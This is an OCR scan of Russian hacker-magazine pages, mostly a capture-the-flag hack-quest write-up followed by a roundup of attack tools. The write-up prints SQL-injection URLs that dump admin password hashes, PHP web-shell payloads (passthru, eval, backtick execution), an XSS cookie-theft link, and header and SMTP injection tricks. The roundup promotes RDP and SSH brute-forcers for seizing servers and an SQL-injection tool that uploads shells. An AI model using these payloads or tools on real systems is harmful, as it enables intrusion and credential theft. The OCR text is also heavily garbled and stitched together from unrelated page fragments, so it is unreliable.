ІіРРр : //172 . 16 . О . 2/зеагсЬ.рЬр?асРіоп=0&РехР=1 *./* ! %2 
Ь ( зе1есР+1+ігот ( зеІесР+соипР ( * ) , сопсаР ( ( зеІесР+РаЬ 
1е_пате+Ргот+іпРогтаРіоп_зс1іета . РаЫез+ѵіЬеге+РаЫе_ 
зсБета ! = ' іпРогтаРіоп_зсБета * +апс1+РаЫе_зс]іета ! = * тузді ' 



На выходе — таблица асітіпз. 

Цррр : //172 . 16 . О . 2/зеагсБ.рЬр?асРіоп=0&РехР=1 ' /* ! %2Ь 
( зе1есР+1+Ргот ( зеІесР+соипР ( * ) , сопсаР ( ( зеіеср+соіи 
тп_пате+Ргот+іпРогтаРіоп_зсЬета . со1итпз+\УЬеге+РаЪ1е_п 
аше= ' асітіпз ' +1ітіР+1 , 1 ) , 0x3 а , Ріоог (гапсі ( 0 ) *2 ) ) 
х+Ргот+іпРогтаРіоп_зсБета . соІитпз+дгоир+Ьу+х) а) * / , 0 ) - 
- + 

Цррр : //172 . 16 . О . 2 / зеагсЪ. . рЦр?асРіоп=0&РехР=1 ' /* ! %2Ь 
( зе1есР+1+Ргот ( зеІесР+соипР ( * ) , сопсаР ( ( зеіеср+соіи 
шп_пате+Ргош+іпРогтаРіоп_зсЦета . со1итпз+ѵ/Ьеге+РаЫе_п 
аше= ' асітіпз ' +1ітіР + 2 , 1 ) , 0x3 а , Ріоог (гапсі ( 0 ) *2 ) ) 
х+Ргот+іпРогтаРіоп_зс1іета . соІитпз+дгоир+Ьу+х) а) * / , 0 ) - 
- + 

А на десерт — имена колонок Іодіп и раззѵѵогсі в таблице асітіпз. 

Цррр://172.16.0. 2 / зеагсЪ. . рЦр?асРіоп=0&РехР=1 ' /* ! %2Ь ( з 
е1есР + 1 + Ргот ( зеІесР+соипР (*) ,сопсаР ( ( зе1есР + сопсаР_мз 
(0x3а, Іодіп, раззчлгогсі) +Ргот+асітіпз + 1ітіР + 0 , 1) , 0x3а, Ріо 
ог (гапсі ( 0 ) *2 ) ) х+Ргот+асітіпз+дгоир+Ьу+х) а) */ , 0 ) -- + 

В результате получаем данные из таблицы асітіпз (имя пользовате- 
ля и Мйб-хеш от пароля). 

После получения ІУЮб-хеша его требовалось восстановить. Самый 
простой способ — воспользоваться бесплатными сервисами вос- 
становления М05-хешей по «радужным таблицам» (например, 
хтбб.огд ). 

Став обладателем имени пользователя и пароля, самое время 
вбить их в какой-нибудь интерфейс :). Обнаружить таковой 
можно в файле гоЬоіз.М, расположенном в корневом каталоге 
веб-сервера. После доступа в админку выдается сообщение 
об ошибке, по которой легко определяется уязвимость класса 
Петоіе Рііе Іпсіисііпд (РРІ). Эксплуатация подобных уязвимостей 
является довольно тривиальной задачей и сводится к указа- 
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Содержимое рс№-файла с Яа$Ь-объектом внутри 

Ьг(109) I I сНг ( 115 ) I I сИг ( 111 ) I I сНг ( 115 ) I I сЬг ( 101 ) I I сііг ( 
114) | | сЬг ( 115 ) +1іші1: + 1+оЕ^зе1і + 1 ) : :СехЦ: :іпЦ-- 



Обход ограничений ЗиЕХЕС 

нию атакуемому веб-приложению запросить файл с сервера 
атакующего. Атакующий же подготавливает файл, содержащий 
код на языке РНР. Пример самого простого кода, позволяющего 
выполнять команды операционной системы: <?рбр раззІбги($_ 

КЕС11ІЕЗТ[ , с , ]);?>. 

После получения возможности выполнения команд ОС требовалось 
скопировать приватный Н5А-ключ одного из пользователей систе- 
мы, а затем, используя полученный Н5А-ключ, реализовать доступ 
к системе по протоколу 55Н и получить доступ к долгожданному 
флагу. 

Именно за последовательность 50І_І->НРІ->Н5А задание и получи- 
ло кодовое имя «Классика». 

Задание №2: Не классика 



На выходе — имена колонок Іодіп и раззѵѵогсі в таблице ѵзтзизегз. 
Следуя подсказке, что в системе зарегистрирован миллионный 
пользователь, которого ждет специальное вознаграждение, 
требовалось получить доступ именно к его учетной записи (инте- 
ресно, что участники старательно не замечали эту подсказку 
и сливали всю таблицу пользователей или пытались создать 
этого «козырного» миллионного пользователя). Получив доступ 
в интерфейс счастливчика, можно заметить новый интерфейс, в 
котором содержится уязвимость типа Рііе Іпсіисііпд (вернее даже 
І_осаІ Рііе ІпсІисІіпд/І_РІ). 

Сложность эксплуатации уязвимости заключается в том, что про- 
исходит проверка длины поступающего запроса, и, если он не 
равен шестнадцати символам, то поступающий запрос не попа- 
дает в функцию іпсІибеО. Решением этой проблемы является 
использование самого короткого РНР веб-шелла (см. гагОг.пате/ 
геІеазез/теда-геІіг-затуДкогоІкщзбеІІ ): 



На этапе исследования сети можно было, аналогично предыду- 
щему заданию, наткнуться на некое веб-приложение, связанное с 
5М5-сервисами. Беглый анализ позволял обнаружить уязвимость 
типа «Внедрение операторов 50Ь> (зеіесііоп-базесі) в базе данных 
РозІдгеЗСБ: 

ЪрЦр : //172 .16.0. 4/іпс1ех . рЦр?г=гесоѵегу&пате=1&етаі1=1 
&зЦаЦиз=сазЦ (ѵегзіоп ( ) +аз+питегіс) 

Приведенный выше запрос выведет версию используемой базы 
данных в сообщении об ошибке. Это работает, так как, во-первых, 
приложение возвращает сообщение об ошибке СУБД пользовате- 
лю, а во-вторых, используется приведение строкового типа к чис- 
ловому. Используя базу іпІогтаІіоп_5сЬета эквивалентно Му5СН_ 
5.x, можно легко и быстро восстановить структуру СУБД: 

ЦЦЦр://172.16.0. 4/іп<іех.рЦр?г=гесоѵегу&пате=1&етаі1 = 1 
&зСаЦиз = 1 ; зеІесС ( зе1есЦ+РаЫе_пате+^гот+іп^огтаРіоп_ 
зсЬета . ЦаЫез + ІітіЦ + І+о^ЕзеР + О ) : :СехР: :іпР-- 
ЪрЦр : //172 .16.0. 4/іпс1ех . рЦр?г=гесоѵегу&пате=1&етаі1=1 
&зРаРиз = 1 ; зеІесС ( зе1есЦ+РаЫе_пате+^гот+іпЕогтаЦіоп_ 



ЪрЦр: //172.16.0. 4/іп<Цех.р1ір?и=ЦѴ89284&р=с1аЦа: , <?=@ ѵ $с 
' ?>&с=1з 

Как это работает? 

1. Использование зігеат ѵѵгаррегз (баіа появился в РНР с версии 
5.2.0); 

2. зЬогІ_ореп_Іад и гедізІег_дІоЬаІз в состоянии «0І\І»; 

3. <?= ?> эквивалентно <? есбо ?>; 

4. Использование обратных кавычек эквивалентно использованию 
зЬеІІ_ехес(). 

Получив таким образом возможность выполнения команд на 
сервере, требовалось получить список пользователей системы (/ 
еіс/раззѵѵсі). После чего, используя любой инструментарий под- 
бора пароля к сервису Іеіпеі (например, ТНС-Нубга, Мебиза, 
псгаск), следовало осуществить подбор используемых паролей 
пользователями системы. Перебор должен был позволить выявить 
пользователя, у которого установлен пароль, совпадающий с его 
идентификатором. Доступ по протоколу Іеіпеі с привилегиями 
этого пользователя давал возможность получить содержимое оче- 
редного флага. 



зсітеша . ЦаЫез + ІітіЦ + І+о^^зеЦ + ІОБ ) : :ЦехЦ: :іпЦ-- 
На выходе — таблица ѵзтзизегз. 

ЪрЦр : //172 . 16 . 0 . 4/іпс1ех . рЬр?г=гесоѵегу&пате=1&етаі1=1& 
зЦаЦиз=1 ; зе1есЦ+ ( зе1есЦ+со1итп_пате+Егош+іп^огтаЦіоп_ 
зсЬеша . со1итпз+\ѵ1геге+ЦаЫе_паше=с]тг ( 118 ) I Іс1тг(115) I |с 



Задание №3: Самописный 
вео-сервер 

Довольно простую уязвимость можно было отыскать на веб-сервере, 
который светил своей мордочкой задание с крякмисом. Это одно из 
самых простых заданий хак-квеста, в котором требовалось найти 
уязвимость типа «Выход за корневой каталог веб-сервера» (раіб 
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Позитивный рсК в разрезе 



Ігаѵегзаі). Указанную уязвимость легко можно было обнаружить 
автоматизированным путем с использованием соответствующих 
инструментов (поэтому очень настораживают конечные результаты 
опііпе-соревнований 5есигіЫаЬ.ги/Ьд201 ОЛігІ.рЬр ). Эксплуатация 
уязвимости требовала лишь отправить веб-серверу запрос следую- 
щего вида: «6ЕТ /../../../гооі/.ЫзІогу НТТР/1.1». Получив содержимое 
истории вводимых администратором команд, с помощью консоль- 
ной магии можно было легко получить очередной флаг. 

Задание N24: Доска объявлений 

В игровой сети располагалось веб-приложение, которое эму- 
лировало работу электронной доски объявлений. Получив 
доступ к исходному коду приложения (для этого требовалось 
обратиться к іпбех.Ьак) можно было восстановить всю логику 
работы приложения, которая заключалась в следующем: если 
пользователь пытался добавить более одного сообщения в 
течение одной минуты, то его ІР-адрес добавлялся в черный 
список (файл Ыаскіізі.рбр). Уязвимость заключалась в том, что 
приложение проверяло переменную окружения веб-сервера 
НТТР_Х_Р0Р\А/АР0ЕВ_Р0Р, и, если указанная переменная была 
установлена, то вместо ІР-адреса в черный список попадало 
содержимое заголовка браузера Х-Еопл/агсІесІ-Еог без какой- 
либо проверки (на самом деле идея баги была позаимствована у 
приложения СиІеЫеѵѵз). 

Эксплуатация уязвимости сводилась к установке в качестве 
заголовка Х-ЕогѵѵагсІесІ-Еог чего-то вроде этого: ';?> <?еѵаІ($_ 
0ЕТ[ , стб , ]);?><?$а='. После получения возможности выполнения 
команд на сервере и прочтения истории команд, вводимых адми- 
нистратором, можно было понять, где спрятан заветный ключ. 

Задание №5: Сгозз-Зііе Зсгірііпд 

Когда речь заходит про атаки вида Х55 (предполагается, что ты 
понимаешь, что эти три буквы значат :]], то все сразу вспоми- 
нают про обычные отраженные и хранимые Х55, и лишь ино- 
гда — еще и про так называемые ООМ-Ьазеб Х55 (см. оѵѵазр. 
огд/іпбех.рбр/РОМ Вазеб Х55 І. А ведь последние известны 
как минимум с 2005 года, когда были описаны в известной ста- 
тье Амита Клейна (см. ѵѵеЬа рргес.огд/ рго]'ес1:5/а г1:іс1ез/071 1 05. 
зЫппІ ). Если коротко, то данный тип Х55 базируется на том, что 
входные данные веб-приложения принимаются и используются 
для модификации РОМ на стороне веб-браузера в контексте 
ОаѵаЭсгірІ-языка. Сам НТТР-ответ сервера таким образом никак 
не изменяется! Классический пример данной уязвимости: 




Функция формирования запроса к веб-приложению 




Манифест хакера, содержащий скрытый ключ 

ЦЦЦр : / /тш. зоте . зіке/раде . ЬЕт1#с1еі:аи11і=<зсгірЦ>а1егЦ ( 

сіоситепр . соокіе) </зсгірк> 

Всё было бы замечательно, но современные веб-браузеры 
решили обезопасить пользователей и параметры адреса пере- 
даются в 5аѵа5сгірІ-контекст в игі-закодированном виде, 
добавляя проблем атакующему и делая эксплуатацию не такой 
тривиальной. К сожалению, такая защита не является доста- 
точным средством, поскольку вариантов использования пара- 
метров адреса довольно много, и они вовсе не ограничиваются 
приведенным выше примером. А с развитием веб-приложений 
(переносом всё большей части логики работы на сторону веб- 
браузера) этот вид Сгозз-Зііе Зсгірііпд ждет перерождение. Но 
вернемся к нашему заданию. Оно было воплощено в виде оче- 
редного клона популярного сервиса микроблоггинга. 

Открываем и изучаем НТМЕ-код главной страницы. В самом 
конце замечаем уязвимый участок кода счётчика посещений: 



</с!іѵ> 

<зсгірк> 

сЗосшпепЕ .тгіке (ипезсаре ( ' %ЗСітд%20згс%ЗВ%22/ітд/зЕаЦ . 
рпд?зіВе= ' +с!оситепВ . ІосаВіоп .Цге:Е+ ' %22%ЗЕ ' ) ) ; 
</зсгірк> 

</с!іѵ> 

</Ьо<Зу> 

</Ыіт1> 



ЗеІесВ уоиг Іапдиаде: 

<зе1есВхзсгірВ> 

(ЗоситепВ . шгіВе ( "<ОРТІ(Ж ѵа1ие=1>" +с!оситепВ . 

ІосаВіоп . Цгеі: . зиЬзкгіпд (сІоситепВ . Іосакіоп . ЦгеЕ . 
іпсЗехО^ ( "сіе^аиІЦ= " ) +8 ) + "</ОРТІ(Ж>" ) ; 
сІоситепВ .шгіке ( "сОРТІОЫ ѵа1ие=2>Епд1ізЦ</ОРТІОЫ>" ) ; 
</зсгірВх/зе1есВ> 

Эксплуатация представляет собой передачу 5аѵа5сгірІ-нагрузки в 
параметре сіеба и Н; следующим образом: 



Дальнейшие действия очевидны — воруем сессию администратора 
сервиса, который, судя по всему, достаточно активно им пользуется. 
Для ЭТОГО: 

Регистрируем нового пользователя. 

2 . Отсылаем администратору личное сообщение, содержащее 
ссылку с 5аѵа5сгір1;-нагрузкой (например, отправка кук на заранее 
приготовленный сниффер). 

3. Администратор нажимает на ссылки в сообщениях, не глядя. 

4 . Заполучив его сессию, в его личных сообщениях и обнаружива- 
ем необходимый нам очередной ключ. 

5 . Ргобі! 
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НТМІ.-КОД с подсказкой 



1. Включение возможности использования символических ссылок 
путем переопределения настроек на каталог сайта ѵазуа.ссі О.зііе: 

есЬ.о ОрЪіопз +Ро11о^8ушЬіпкз > /изг/ ІосаІ/ѵллплг/сІаЦа/ 
ѵазуа/ . Ъкассезз 

2. Осуществление доступа к каталогу сайта, содержащему игро- 
вой «флаг»: 1п -з /изг/1оса1/ѵ\плплг/с1аДа/госЩ/ . Ькассезз / 
изг/1оса1/ѵ\плплг/с1аЦа/ѵазуа/ЦезЦ . ЪхЪ 

3. Осуществление доступа к файлу, содержащему данные для 
аутентификации на сайте гООЕссІ О.зііе: 1п -з /изг/іосаі/ 
ѵтѵі/ сІаСа/гооД/ . Ыіразз^(і_пе^ /изг/ Іосаі /ѵ\плплг/с1аЦа/ 
ѵазуа/раззѵ\кі . ЪхЪ 

4. Расшифровка полученного М05-хеша (например, с исполь- 
зование РаззѵѵогсІзРго или Зобп Пае Ріррег) 

5. Доступ к содержимому сайта гООі.ссі О.зііе и получение игро- 
вого ключа 

Задание №7: Позитивный РРР 



Задание N26: Хостинг 

Проводя исследование игровой сети, можно наткнуться на 
сервер, который светил страницей по умолчанию веб-сервера 
АрасЬе на 80-м порту, а также использовался в качестве 
5МТР- и ВЫ5-сервера. Чтобы понять, какие сайты обслуживает 
веб-сервер, требовалось осуществить перенос 0Ы5-зоны. Но 
какой зоны? Ответ на этот вопрос мог быть получен из обрат- 
ной ОЫЗ-зоны, которая также обслуживалась на этом сервере. 
Узнаем про 0Ы5-суффикс, используемый веб-сервером: 9ід 
(91 72.1 6.0.1 0 РТР 1 0.0.1 6.1 72.іп-а99г.агра 

Осуществляем перенос 0Ы5-зоны: 9ід (9172.16.0.10 ссЮ.зТе ахбг 
Далее требовалось настроиться на использование этого 0Ы5- 
сервера (или прописать соответствующие имена в файлик 
Ьозіг). После беглого осмотра доступных сайтов можно было 
обнаружить уязвимость типа І_осаІ Рііе Іпсіибіпд на сайте 
Василия Пупкина. Для ее эксплуатации и дальнейшего раз- 
вития атаки единственным способом являлось использование 
5МТР-демона в качестве транспорта для проброса полезной 
нагрузки (см. хакер.ги/роз1:/49508/9е1 : аи[1:.а5р ]. Например, сле- 
дующим образом: 

ЪеІпеЪ 172.16.0.10 25 

еЫо ссЮ . зіЪе 

шаіі Ігош : апу@сс1 0 . зіЬе 

гсрЦ До: ѵазуа 

сІаЪа 

<?рЦр раззЫтги ( $_СЕТ [ 1 стсі ']);?> 

Е1ІТЕК 

Проделав ряд шаманских манипуляций с 5МТР-демоном, ста- 
новилось возможным получить доступ к выполнению команд 
операционной системы: 



В одном из заданий хак-квеста предлагалось изучить (пози- 
тивный) рсіб-фа йл , который обращался к веб-приложению с 
использованием встроенных алгоритмов шифрования. По спе- 
циальным маркерам можно было сделать вывод, что в рсіб-фа йл 
внедрен еще и НазЬ-объект. 

Далее, также по специальному маркеру, необходимо было опре- 
делить, что зѵѵі 1 внутри рсіб-фа йл а внедрен с использованием 
сжатия 2 ІіЬ. Таким образом получить «чистый» зѵѵі'-файл воз- 
можно, например, при помощи библиотеки 2 ІіЬ языка Руібоп. 
Следующим этапом являлось восстановление алгоритма форми- 
рования запроса к веб-приложению по выдернутому зѵѵі'-файлу. 
Для этого можно было воспользоваться утилитой зѵѵМитр из 
пакета зѵѵбіооіз. Особое внимание следовало обратить на функ- 
цию ОЫшзсаІе — она и выполняет функцию генерации запроса 
к серверу. 

Сам ключ, по которому выполняется шифрование, нужно было 
восстановить из следующего фрагмента кода: 



00016) 


+ 


0 : 0 


деЪ1оса!_0 


00017) 


+ 


1 : 0 


ризЫпЪ 


170 


00018) 


+ 


2 : 0 


ризЫпЪ 


42 


00019) 


+ 


3 : 0 


ризЫпЪ 


52 


00020) 


+ 


4 : 0 


ризЫпЪ 


120 


00021) 


+ 


5 : 0 


ризЫпЪ 


178 


00022) 


+ 


6 : 0 


ризЫпЪ 


249 


00023) 


+ 


7 : 0 


ризЫпЪ 


255 


00024) 


+ 


8 : 0 


ризЫпЪ 


228 


00025) 


+ 


9 : 0 


ризЫпЪ 


80 


00026) 


+ 


10: 


0 ризЫпЪ 


32 



Зная ключ и алгоритм шифрования, возможно генерировать 
произвольные запросы к веб-приложению. Чтобы получить 
игровой флаг, требовалось сформировать запрос к веб- 
приложению с использованием простейшей техники эксплуата- 
ции уязвимости «Внедрение операторов 501». 



ЦЦЦр : / / ѵазуа . ссІО . зіЪе/іпсІех . р1ір?1і1е=/ѵаг/таі1/ 
ѵазуа%00&стс!=1з -Іа / 

Но даже с таким доступом к серверу чтобы получить игро- 
вой ключ, нужно очень постараться. Причина этому — модуль 
ЗиЕХЕС, который разграничивал доступ к соседним сайтам. 

Для обхода указанных ограничений требовалось использовать 
символические ссылки (см. кегпе[рапік.огд/9осз/кегпе[рапік/ 
зиехес.еп.рбЯ . Это было возможным только по причине того, 
что в конфигурации веб-сервера использовалась директива 
АІІоѵѵОѵе ггісі е АН. 

Дальнейшая атака сводилась к выполнению следующих запро- 
сов: 



Задание №8: Стеганография 

Стеганография — это наука о скрытой передаче информации 
путем сохранения в тайне самого факта передачи. В отличие 
от криптографии, которая скрывает содержимое секретного 
сообщения, стеганография скрывает само его существование. 
В цифровом мире в качестве контейнера для скрываемой 
информации обычно используют мультимедиа-объекты (изо- 
бражения, видео, аудио, текстуры 30-объектов) и внесение 
искажений, которые находятся ниже порога чувствительности 
среднестатистического человека и не приводят к заметным 
изменениям этих объектов. Но, как несложно догадаться, кон- 
тейнером может выступить не только мультимедиа-файл. В 
нашем случае в роли контейнера выступил НТМЕ-код! Дело в 
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Раскрытие идентификатора пользователя 



3! С №ікІО№\іу!(епі32\ст(І.е№ =ІОІ ж 

Місі«озо?с НіпЛоиз [Версия 6.0. [.ООН а 

<0 Корпорация Майкрософт, 2006. Все права зашнідены. 

с:ЧІ(рНЬіе[ ,пу І9Я ,168, 192.12 

ЖРО: міп ш :рипрвД і'ои(ві*~соп?д 

ШРО: лаіп :Т0Та1 (іте: 0:00:09.154000 

Ь:\тр). 

ЛІ 



Подбор файлов на ТРТР-сервисе 



том, что веб-браузер при отображении страницы игнорирует 
идущие подряд пробельные символы, если они не заданы как 
НТМІ_-мнемоники. Таким образом два и более пробела показы- 
ваются как один. То же самое относится к символам табуляции 
и переноса строк. 

Это был краткий экскурс в теорию. А само задание представ- 
ляло собой НТМІ_-страницу с Манифестом хакера (стыд и позор 
тебе, %іі5егпате%, если ты не читал это послание Ментора), 
которое можно было отыскать на просторах игровой сети. 
Предполагая всю трудность раскрытия специфики задания, в 
НТМІ_-коде была заботливо оставлена подсказка, указывающая 
на то, что пробелы в коде могут выполнять не только роль раз- 
деления слов в предложениях. Внимательный участник мог 
обнаружить, что слова в тексте разделены не везде одинаково. 
Если говорить более конкретно, то один пробел представлял 
собой не что иное, как «О», а двойной пробел, соответственно, 
«1». Иными словами, речь идет про один бит информации. 
Восемь бит есть один байт и одновременно код символа в 
АЭСІІ-таблице. Ограничителем сообщения выступала после- 
довательность «пробел + символ табуляции». Задание было 
осложнено именно пониманием того, что текст - не просто 
очередная попытка пропаганды хакинга, а эта обычная статич- 
ная НТМІ_-страница и есть задание, из которого и надо добыть 
заветный ключ. 

Задание №9: Сізсо 

Помимо ханипотов, эмулирующих сетевые устройства и раз- 
личные операционные системы, в игровой сети можно было 
отыскать самый что ни на есть «живой» роутер на базе Сізсо 
105. Сканирование ТСР-портов должно было показать, что 
доступен сервис РІ N О Е Р . Обратившись к этому сервису, 
можно было получить имя зарегистрированного пользователя 
на устройстве. Дальше достаточно было проверить на порту 
ТЕІ_ЫЕТ имя этого пользователя с паролем «сізсо» (стандарт- 
ный пароль для оборудования Сізсо). Следующий шаг заклю- 
чался в поднятии привилегий на устройстве. Само собой, речь 
не шла о пятнадцатом уровне доступа :). Но на третий уровень 
доступа с паролем «сізсо» можно было подняться. Уже на этом 



этапе у пользователя хватало привилегий, чтобы просмотреть 
запущенную конфигурацию. Используя команду «РоіЛег#зЬо\л/ 
гиппіпд-сопбд ѵіеѵѵ б и 1 1 » можно было получить конфигурацию 
устройства, а вместе с ней и игровой флаг. 

Задание №10: ТРТР 

Одно из самых простых заданий, которое можно было отыскать 
в игровой сети — это задание, связанное с ТЕТР-сервисом. 
Однако, как оказалось, без каких-либо подсказок и оно стало 
довольно сложным для большинства участников. Для решения 
задания требовалось обнаружить доступный ТЕТР-сервис (69/ 
ибр), а затем подобрать имя файла, которое на нем хранилось. 
Как раз подбор и вызвал наибольшие сложности у участ- 
ников соревнования. Имя файла, которое необходимо было 
подобрать — это «гоиіег-сопбд», стандартное имя файла по 
умолчанию при копировании конфигурации с консоли обо- 
рудования на базе Сізсо 105. Примечательно, что в словарях 
систем поиска уязвимостей и даже специализированных 
инструментах (таких, как ШріЬеІТ) отсутствует заветное имя 
«гоіЛег-сопбд». 

Если же файл был все-таки получен, то проблем с выдергива- 
нием из него игрового ключа не возникало. Ключ хранился в 
формате паролей «зесгеі 7» и мог быть восстановлен различ- 
ными инструментами (например, с использованием Саіп&АЬеІ). 

Заключение 

К сожалению, формат журнала не позволяет рассказать про 
все задания (их было более двадцати), предложенные на 
Н 020 1 0 . Поэтому расширенная версия данной публикации 
доступна в электронном виде по адресу хакерги.ЬаЬгаЬаЬг.ги/ . 
Спасибо всем, кто принимал участие в соревновании Н 020 1 0 ! 
Спасибо разработчикам Н 02 0 1 0 , сделавшим его таким насы- 
щенным и интересным. Отдельное спасибо Тимуру Юнусову, 
Сергею Павлову, Александру Матросову, Владимиру Воронцову 
ака ООгпр, Валере Марчуку. Также хочется поблагодарить всех 
организаторов и спонсоров (в частности, Е5ЕТ и 5есигі1:уІ_аЬ), 
которые предоставили возможность провести подобное меро- 
приятие. До скорых встреч на будущих хак-квестах! гг 
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Программа: Раз* РРР Вги*е 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: РОІед 




Правильный бругфорс дедиков 

Наконец-то это случилось! Спешу пред- 
ставить твоему вниманию замечательный, 
функциональный, а главное — быстрый РБР 
брутфорс Разі РБР Вгиіе! По сути данная про- 
грамма представляет собой аналог приватно- 
го СКзз-брута, который основан на протоколе 
РБР версии 5. 

Особенности брута: 

• использует протокол КБР 5 ; 

• неограниченное количество потоков 
(рекомендовано от 3 0 до 120) ; 

• скорость брута на уровне при- 
ватных аналогов (до 120 паролей в 
секунду) ; 

• простой интерфейс ; 

• встроенная проверка обновлений. 

Для начала работы сданным брутфорсом тебе 
будет необходимо насканить определенные 
диапазоны ІР-адресов. Для этого: 

1. Устанавливаем всем известный сканер 
птар (официальная страница сканера: 
іпзесиге.огд ). 

2 . Копируем в ХЛРгодгат РіІезМЧтарХзсгірІз 
скрипт гбр.пзе (его можно найти на нашем 
диске). 

3. Создаем следующий .ба! файл: 

@ес!ю о 

Іог /1 %%%х іп (1,1,100) бо ( 
зіагі " гбр" /НІСН пшар -п -Рп -р 
Т : 3389 -Т5 --зсгірб гбр.пзе -ІК 0 
) 

ехіі 

4 . Запускаем, ждем пару часов и, наконец, 
брутим :) 

Другие особенности проги ты сможешьузнать 
на ее официальной страничке: гбрЬ.биІ:2.ги . 



Программа: Медвежья хватка 
(МесІѴѴеЬбгазр, МѴѴ6) 

ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: іНогпе* 




5СН. инъекции под колпаком! 

На очереди очередной хакерский комбайн 
для исследования уязвимостей типа 5СН_- 
іщесбоп под патриотическим названием 
«Медвежья хватка» (выкладываниетаких 
а Ц іпсіизіѵе программ уже вошло в добрую 
традицию нашей рубрики). 

Основные возможности и модули «Медвежь- 
ей хватки»: 

• сбор и хранение информации об уяз- 
вимом сайте и учетных записях поль- 
зователей (модуль «Знаток») ; 

• сбор и хранение информации из БД и 
файлов конфигурации уязвимого сайта 
(модуль «Архивариус») ; 

• выполнение обычных и слепых инжек- 
тов (модуль «Хирург») ; 

• онлайновый поиск значений хэшей 
(модуль «Детектив») ; 

• сканер особенностей сайта, имею- 
щихся таблиц и открытых портов (мо- 
дуль «Разведчик») ; 

• сканер структуры сайта, поиск па- 
пок и файлов (модуль «Следопыт») ; 

• инструмент для чтения файлов и ди- 
ректорий (модуль «Читатель») ; 

• инструмент для закачки скриптов на 
сервер (модуль «Лекарь») ; 

• аудит работоспособности уязвимос- 
тей и шеллов (модуль «Ревизор») ; 

• гибко настраиваемые профили за- 
просов и построителей (модуль «На- 
стройщик») ; 

• конвертор кодировок (модуль «Тол- 
мач») ; 

• экспорт содержимого баз в тексто- 
вый файл (модуль «Коробейник») . 

Ты удивишься, но все это великолепие 
является всего лишь приложением к БД 
М3 Асеева 2003! Таким образом, ты смо- 



жешь исследовать 5СН_- инъекции, почти не 
прикасаясь к клавиатуре, только с помощью 
предварительно настроенных профилей. У 
этой утилиты также есть и некоторые огра- 
ничения, которые, впрочем, неявляются 
сколько-нибудь существенными: 

• отсутствует поиск уязвимых сайтов; 

• работа только с БД Му ЗОБ ; 

• нет возможности работать через 
прокси . 

На практике ты сможешь использовать«Мед- 
вежью хватку», например, так: 

1. Ты нашел ЗОБ инъекцию следующего 
вида: 

Ыір : //тузііе. сот/зйсж.р1ір?іс1=3+ипі 
оп+зеіесі+і , 2 ,изег ( ) ,4,5-- 

2 . Копируй данную инъекцию в буфер обме- 
на и переходи в «Медвежью хватку». 

3. Нажимай на кнопку новой записи и обя- 
зательно проверь, чтобы курсор стоял в 
верхнем поле. 

4 . Жми на кнопку «умной» вставки (при этом 
адрес из буфера разбивается на два поля). 

5 . Вызывай модуль «Хирург» с помощью 
кнопки «ЗОБ» или «В50Б» (в зависимости 
от формата строки запроса), по умолчанию 
форма открывается с профилем «Данные о 
базе». 

6 . Нажимай на кнопку выполнения запроса. 

7 . Если все прошло правильно, то в поле 
«Найдено» ты увидишь строку результата. 

8. Далее нажимай на кнопку «Свойства БД» 
(полученные данные сохранятся в базе про- 
граммы) и выбирай профиль «Непустые таб- 
лицы», чтобы снова выполнить запрос. 

9 . Сохрани результат с помощью кнопки 
«Таблицы» (если надпись «Далее» стала 
красного цвета, это значит, что необходимы 
дополнительные запросы для извлечения 
всех данных, в этом случае жми на кнопку 
«*****[0Д» и жди окончания серии запро- 
сов). 

10 . Далее выполняй профиль «Непустые таб- 
лицы с *равв*,*р\л/с1*,*р5\л/*», который отоб- 
разит все таблицы, имеющие поля паролей. 
11 Теперь, когда известны имена таблиц, 
содержащие пароли, можно вызвать и 
выполнить профиль «* столбцы для табли- 
цы» (результатом запроса по этому профилю 
будет список столбцов для выбранной таб- 
лицы). 

12 . Теперь запрашивай данные учетных 
записей с помощью вызова профиля «* таб- 
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лица» или «* схема.таблица» и выбора в них 
соответствующих имен. 

13 . Сохраняй результат в подтаблицу пользо- 
вателей кнопками «Имя и хэш» или «Имя и 
пароль». 

14 . Теперь, имея на руках полную базу таблиц, 
столбцов, пользователей и так далее наше- 
го тестового уязвимого сайта, ты сможешь 
залить шелл с помощью модуля «Лекарь» или 
сам определиться с дальнейшими действия- 
ми с помощью своей фантазии. 

Особенно хочется отметить уже упомянутый 
выше модуль «Лекарь», который предназначен 
для загрузки шеллов на сайтчерез уязвимость 
прав доступа кфайловой системе (ІоасИіІе) при 
отключенном режиме тадіс_дио1:е5. 

Для работы сданным модулем тебе необходимо 
лишьзадать путь и имя файла в верхних двух 
полях. 

Переключатель слева внизу выбирает один из 
вариантов закачки: 

• тестовый — проверка возможности за- 
качки тестового файла в папку /Стр/; 

• информационный — закачка функции 
рйріпбо ( ) по указанному пути; 

• командный шелл — закачка функции 
выполнения *піх-команд; 

• инклудинг — закачка шелла для инклу- 
да внешнего скрипта; 

• аплоадер — закачка скрипта для апло- 
ада. 

Поля справа от переключателя позволяют мо- 
дифицировать закачиваемый скрипт. В случае 
успешной закачки (проверяется повторным 
скачиванием и сравнением) выдается соот- 
ветствующее сообщение. 

Остальные мануалы по работе других модулей 
ты сможешь прочитать в подробном РеабМе из 
архива с прогой. 

Автор комбайна будеточень радуслышать 
твои предложения, замечания и пожелания на 
сайтах тѵѵд іаг.ги и тѵѵдгазр.опі.сс (кстати, там 
же ты сможешь найти исходники «Медвежьей 
хватки» и подробные обучающие видео). 

Программа: 55Н Впгіеіогсе 
ОС: ѴѴіп<іо\л/$ 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор Каіті 




Брутим 55Н 



Атеперь настало время представить тебе дол- 
гожданную прогу для брутфорса 55Н — 55Н 
ВпЛеФгсе от Каіті! 

Особенности брутфорса: 

• многопоточность; 

• три режима перебора (по списку 
логинов, по списку паролей, по 
списку «логин; пароль») ; 

• перебор ІР по диапазону или по 
списку из файла; 

• возможность установки тайм-аута 
соединения при проверке порта; 

• подобранные логины и пароли со- 
храняются в файл Ьгибе_дооб . бхб ; 

• распараллеливание идет по ІР- 
адресам (если в диапазоне один ІР 
и в настройках стоит сто потоков , 
то фактически перебор идет в один 
поток) . 

За исходниками и поддержкой заходи на 
официальную страничку ути литы: каіті. 
ги/201 0/1 2/55Ь-ЬгиіеЬгсе . 

Программа: РНР ОМизсаІог 1.5 
ОС: *піх/ѵѵіп 

Автор: сіх 




Каша в РНР коде 



Последним в нашем сегодняшнем обзоре 
предстает один из лучших РНР-обфускато- 
